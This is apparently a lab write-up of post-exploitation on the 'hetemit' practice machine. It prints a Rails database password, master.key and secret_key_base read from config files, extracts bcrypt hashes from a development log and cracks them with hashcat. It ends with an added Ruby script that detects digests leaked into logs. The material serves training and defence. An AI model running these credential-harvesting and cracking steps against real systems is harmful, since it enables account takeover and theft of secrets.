register_hetemit


Checking for the web root directory of the register_hetemit application, which is running as PID 1394.

It is located in the home directory of the current user, cmeeks:

[cmeeks@hetemit ~]$ cd register_hetemit/ ; ls -la
total 424
drwxr-xr-x   15 cmeeks cmeeks   4096 Nov 12  2020 .
drwx------.  12 cmeeks cmeeks   4096 Feb  4 21:02 ..
-rw-r--r--    1 cmeeks cmeeks      9 Nov 12  2020 .browserslistrc
drwxr-xr-x    8 cmeeks cmeeks    166 Nov 12  2020 .git
-rw-r--r--    1 cmeeks cmeeks    771 Nov 12  2020 .gitignore
-rw-r--r--    1 cmeeks cmeeks     11 Nov 12  2020 .ruby-version
-rw-r--r--    1 cmeeks cmeeks   1971 Nov 12  2020 Gemfile
-rw-r--r--    1 cmeeks cmeeks   5550 Nov 12  2020 Gemfile.lock
-rw-r--r--    1 cmeeks cmeeks    374 Nov 12  2020 README.md
-rw-r--r--    1 cmeeks cmeeks    227 Nov 12  2020 Rakefile
drwxr-xr-x   11 cmeeks cmeeks    142 Nov 12  2020 app
-rw-r--r--    1 cmeeks cmeeks   1722 Nov 12  2020 babel.config.js
drwxr-xr-x    2 cmeeks cmeeks    125 Nov 12  2020 bin
drwxr-xr-x    6 cmeeks cmeeks    306 Nov 13  2020 config
-rw-r--r--    1 cmeeks cmeeks    130 Nov 12  2020 config.ru
drwxr-xr-x    3 cmeeks cmeeks     54 Nov 12  2020 db
drwxr-xr-x    4 cmeeks cmeeks     33 Nov 12  2020 lib
drwxr-xr-x    2 cmeeks cmeeks     42 Nov 12  2020 log
drwxr-xr-x  769 cmeeks cmeeks  24576 Nov 13  2020 node_modules
-rw-r--r--    1 cmeeks cmeeks    325 Nov 12  2020 package.json
-rw-r--r--    1 cmeeks cmeeks    224 Nov 12  2020 postcss.config.js
drwxr-xr-x    3 cmeeks cmeeks    172 Nov 12  2020 public
drwxr-xr-x    3 cmeeks cmeeks     29 Nov 12  2020 storage
drwxr-xr-x   10 cmeeks cmeeks    195 Nov 12  2020 test
drwxr-xr-x    6 cmeeks cmeeks    123 Nov 12  2020 tmp
drwxr-xr-x    2 cmeeks cmeeks     19 Nov 12  2020 vendor
-rw-r--r--    1 cmeeks cmeeks 332349 Nov 12  2020 yarn.lock

There are several configuration files (config.ru, Gemfile, package.json) and a config directory worth inspecting.

Configuration


[cmeeks@hetemit register_hetemit]$ cat config.ru 
# This file is used by Rack-based servers to start the application.
 
require_relative 'config/environment'
 
run Rails.application
 
[cmeeks@hetemit register_hetemit]$ cd config/ ; ls -la
total 52
drwxr-xr-x  6 cmeeks cmeeks  306 Nov 13  2020 .
drwxr-xr-x 15 cmeeks cmeeks 4096 Nov 12  2020 ..
-rw-r--r--  1 cmeeks cmeeks  666 Nov 12  2020 application.rb
-rw-r--r--  1 cmeeks cmeeks  207 Nov 12  2020 boot.rb
-rw-r--r--  1 cmeeks cmeeks  197 Nov 12  2020 cable.yml
-rw-r--r--  1 cmeeks cmeeks  464 Nov 12  2020 credentials.yml.enc
-rw-r--r--  1 cmeeks cmeeks 3082 Nov 13  2020 database.yml
-rw-r--r--  1 cmeeks cmeeks  128 Nov 12  2020 environment.rb
drwxr-xr-x  2 cmeeks cmeeks   64 Nov 12  2020 environments
drwxr-xr-x  2 cmeeks cmeeks  262 Nov 12  2020 initializers
drwxr-xr-x  2 cmeeks cmeeks   20 Nov 12  2020 locales
-rw-------  1 cmeeks cmeeks   32 Nov 12  2020 master.key
-rw-r--r--  1 cmeeks cmeeks 1585 Nov 12  2020 puma.rb
-rw-r--r--  1 cmeeks cmeeks  253 Nov 12  2020 routes.rb
-rw-r--r--  1 cmeeks cmeeks   97 Nov 12  2020 spring.rb
-rw-r--r--  1 cmeeks cmeeks 1093 Nov 12  2020 storage.yml
drwxr-xr-x  2 cmeeks cmeeks   86 Nov 12  2020 webpack
-rw-r--r--  1 cmeeks cmeeks 1954 Nov 12  2020 webpacker.yml

Checking the config directory: database.yml, credentials.yml.enc and master.key are the files of interest.

DB Credential


[cmeeks@hetemit config]$ cat /home/cmeeks/register_hetemit/config/database.yml  | grep -v '^#'
default: &default
  adapter: postgresql
  encoding: unicode
  # For details on connection pooling, see Rails configuration guide
  # https://guides.rubyonrails.org/configuring.html#database-pooling
  pool: <%= ENV.fetch("RAILS_MAX_THREADS") { 5 } %>
 
development:
  <<: *default
  database: register_hetemit
  username: railsdev
  password: OpenProduceTreat153
 
[...REDACTED...]

Database credentials identified: the development database uses the PostgreSQL user railsdev with the password shown above.

Encrypted Credential


[cmeeks@hetemit config]$ cat credentials.yml.enc 
uVh9vtpvSxSDb8ziQMlZn0c36nxVICZIz0xNJyQnIVc9oLOSxmRMIvUEHHsyWYJUUybzt9PQPtNu6sXd972hD/ED7Yu5XAXoxP64xSGtjqdbOAOPBxauh4JDQm4dO0Az6S3F914yDxJ7LD17/RYwMOky8RbfjVJXEaZT934OXCh2GWI8bjwGy8qamYZ5EqjH7IdfHHpVcCuZoyjgyvCwQHxIIlzVsf+ERJWahOa0DAIpAB+Y76dLGhJxLMLokg3LxhahiV9ZrymNHlpugqZJA/LX2EyeWJ92WHpzysKPeMbat8o5xwQwsgJ92yqQutcdUAzI5L+faTUzOWnkoHQ+j/s2ZBCqwbXGPvpnuhkght8rUMGJbQAPwGce+T97K2HSCaZe9+HTrmGmY4ikRO/QBOeRaAbgdlIBCQjk--KXo9J+QmBaKbVFLz--9pBMZYMrjhAlj5EWBjFHVA==
 
[cmeeks@hetemit config]$ cat master.key 
13d501513ae570e4d2e50edfa97de275

Both the encrypted credentials file and the master.key that decrypts it were readable as cmeeks.

tmp/development_secret.txt


[cmeeks@hetemit register_hetemit]$ cat tmp/development_secret.txt 
716e96c9641423bae8197fd5240d783493e99bcbaa0945ddc8b60d6592f8b3964754a43f5bce410ee25fb4681928690382bc2f52657b91a60f9f850d621ddde8

development_secret.txt, which Rails uses as the secret_key_base for the development environment, was also readable.

log


[cmeeks@hetemit register_hetemit]$ cd log/ ; ll
total 12028
-rw-r--r-- 1 cmeeks cmeeks 12316009 Feb  4 20:51 development.log
[cmeeks@hetemit log]$ grep -i -R "password_digest" ./
./development.log:NoMethodError (undefined method `password_digest=' for #<User:0x00007fa1b0c14ea0>
./development.log:NoMethodError (undefined method `password_digest=' for #<User:0x00007fa1b0eda090>
./development.log:NoMethodError (undefined method `password_digest' for #<User:0x0000564bd0108570>
./development.log:   (4.1ms)  ALTER TABLE "users" RENAME COLUMN "password" TO "password_digest"
./development.log:  User Create (2.8ms)  INSERT INTO "users" ("email", "username", "password_digest", "created_at", "updated_at") VALUES ($1, $2, $3, $4, $5) RETURNING "id"  [["email", "alexertech@local"], ["username", "alexertech"], ["password_digest", "$2a$12$u8pzr7GafCt2feEKGChHM.w/iu7zii6x9SXmXqgqpYg1CbJcAsS3O"], ["created_at", "2020-11-12 16:38:48.050415"], ["updated_at", "2020-11-12 16:38:48.050415"]]
./development.log:  User Create (1.5ms)  INSERT INTO "users" ("email", "username", "password_digest", "created_at", "updated_at") VALUES ($1, $2, $3, $4, $5) RETURNING "id"  [["email", "alexertech@local"], ["username", "alexertech"], ["password_digest", "$2a$12$59HpnfnNKIxpZoyZHY7PPel8sLFqaOBx6X.IFAsvGTwKidUDjVfNO"], ["created_at", "2020-11-12 16:44:22.769816"], ["updated_at", "2020-11-12 16:44:22.769816"]]
./development.log:  User Create (5.4ms)  INSERT INTO "users" ("email", "username", "password_digest", "created_at", "updated_at", "invite_code") VALUES ($1, $2, $3, $4, $5, $6) RETURNING "id"  [["email", "test@testing"], ["username", "test"], ["password_digest", "$2a$12$YjUfD0ILSfReOUv507.cD.g3UWpvDdgDlow9uBUKC5YALfFDZdpGG"], ["created_at", "2020-11-12 19:23:41.460130"], ["updated_at", "2020-11-12 19:23:41.460130"], ["invite_code", "5a81d05b8969fd1f156969da357bcd7f9bf0430c90035f017c88f9b5249b3e9e"]]
./development.log:   (0.3ms)  ALTER TABLE "users" RENAME COLUMN "password" TO "password_digest"

The following two bcrypt hashes were identified:

  • $2a$12$u8pzr7GafCt2feEKGChHM.w/iu7zii6x9SXmXqgqpYg1CbJcAsS3O
  • $2a$12$59HpnfnNKIxpZoyZHY7PPel8sLFqaOBx6X.IFAsvGTwKidUDjVfNO

Password Cracking


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hetemit]
└─$ hashcat --show ./hashes.txt                                          
The following 4 hash-modes match the structure of your input hash:
 
      # | Name                                                       | Category
  ======+============================================================+======================================
   3200 | bcrypt $2*$, Blowfish (Unix)                               | Operating System
  25600 | bcrypt(md5($pass)) / bcryptmd5                             | Forums, CMS, E-Commerce
  25800 | bcrypt(sha1($pass)) / bcryptsha1                           | Forums, CMS, E-Commerce
  28400 | bcrypt(sha512($pass)) / bcryptsha512                       | Forums, CMS, E-Commerce
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hetemit]
└─$ hashcat -m 3200 -a 0 ./hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
 
Hashes: 2 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Optimizers applied:
* Zero-Byte
 
Watchdog: Temperature abort trigger set to 90c
 
Host memory required for this attack: 0 MB
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
$2a$12$u8pzr7GafCt2feEKGChHM.w/iu7zii6x9SXmXqgqpYg1CbJcAsS3O:myself
$2a$12$59HpnfnNKIxpZoyZHY7PPel8sLFqaOBx6X.IFAsvGTwKidUDjVfNO:myself
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: ./hashes.txt
Time.Started.....: Tue Feb  4 22:29:24 2025 (35 secs)
Time.Estimated...: Tue Feb  4 22:29:59 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:       50 H/s (4.85ms) @ Accel:12 Loops:8 Thr:1 Vec:1
Recovered........: 2/2 (100.00%) Digests (total), 2/2 (100.00%) Digests (new), 2/2 (100.00%) Salts
Progress.........: 1728/28688770 (0.01%)
Rejected.........: 0/1728 (0.00%)
Restore.Point....: 720/14344385 (0.01%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:4088-4096
Candidate.Engine.: Device Generator
Candidates.#1....: dreamer -> felipe
Hardware.Mon.#1..: Util: 89%
 
Started: Tue Feb  4 22:28:51 2025
Stopped: Tue Feb  4 22:30:00 2025

Both hashes cracked to the password myself; N/A.
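As an added example, not part of the original writeup, the Ruby script below does from the defender's side what the grep and hashcat steps above did by hand: it scans Rails log output for bcrypt digests that leaked through SQL query logging, reports each unique digest once with the line it first appeared on, and parses the cost factor that explains hashcat's low 50 H/s. The log lines in SAMPLE_LOG are constructed to match the development.log entries quoted above; the function names are my own.

```ruby
# Added example, not part of the original writeup: find bcrypt password
# digests leaked into a Rails log and parse their cost factor. bcrypt's cost
# is the log2 of the key-setup rounds: cost 12 means 2**12 = 4096 rounds per
# guess, which is why the hashcat status above shows "Iteration:4088-4096"
# and a rate of only ~50 H/s.

# Modular-crypt form: $2<v>$<cost>$<22-char salt><31-char digest>, i.e. 53
# characters of the bcrypt base64 alphabet after the cost field.
BCRYPT_RE = /\$2[abxy]\$\d{2}\$[.\/A-Za-z0-9]{53}/

# Constructed sample lines, shaped like the development.log entries above.
SAMPLE_LOG = <<~'LOG'
  NoMethodError (undefined method `password_digest=' for #<User:0x00007fa1b0c14ea0>
    User Create (2.8ms)  INSERT INTO "users" ("email", "password_digest") VALUES ($1, $2)  [["email", "alexertech@local"], ["password_digest", "$2a$12$u8pzr7GafCt2feEKGChHM.w/iu7zii6x9SXmXqgqpYg1CbJcAsS3O"]]
    User Create (1.5ms)  INSERT INTO "users" ("email", "password_digest") VALUES ($1, $2)  [["email", "alexertech@local"], ["password_digest", "$2a$12$59HpnfnNKIxpZoyZHY7PPel8sLFqaOBx6X.IFAsvGTwKidUDjVfNO"]]
    User Update (0.9ms)  UPDATE "users" SET "password_digest" = $1  [["password_digest", "$2a$12$u8pzr7GafCt2feEKGChHM.w/iu7zii6x9SXmXqgqpYg1CbJcAsS3O"]]
LOG

# Split one digest into version, cost, rounds and salt; nil if malformed.
def parse_bcrypt(digest)
  m = digest.match(/\A\$(2[abxy])\$(\d{2})\$([.\/A-Za-z0-9]{22})([.\/A-Za-z0-9]{31})\z/)
  return nil unless m
  cost = m[2].to_i
  { version: m[1], cost: cost, rounds: 2**cost, salt: m[3] }
end

# Walk the log line by line. The first line a digest appears on is kept so an
# investigator can jump straight to the statement that leaked it; repeats of
# the same digest (e.g. an UPDATE re-writing it) are not reported again.
def find_leaked_digests(log_text)
  found = {}
  log_text.each_line.with_index(1) do |line, lineno|
    line.scan(BCRYPT_RE).each do |digest|
      found[digest] ||= parse_bcrypt(digest).merge(line: lineno)
    end
  end
  found
end

if __FILE__ == $PROGRAM_NAME
  find_leaked_digests(SAMPLE_LOG).each do |digest, info|
    puts "line #{info[:line]}: #{digest[0, 12]}... cost=#{info[:cost]} (#{info[:rounds]} rounds)"
  end
end
```

Run against a real development.log with `find_leaked_digests(File.read("log/development.log"))`; any hit means password digests are being written to a world-readable log and the logging level or query logging for that environment needs attention.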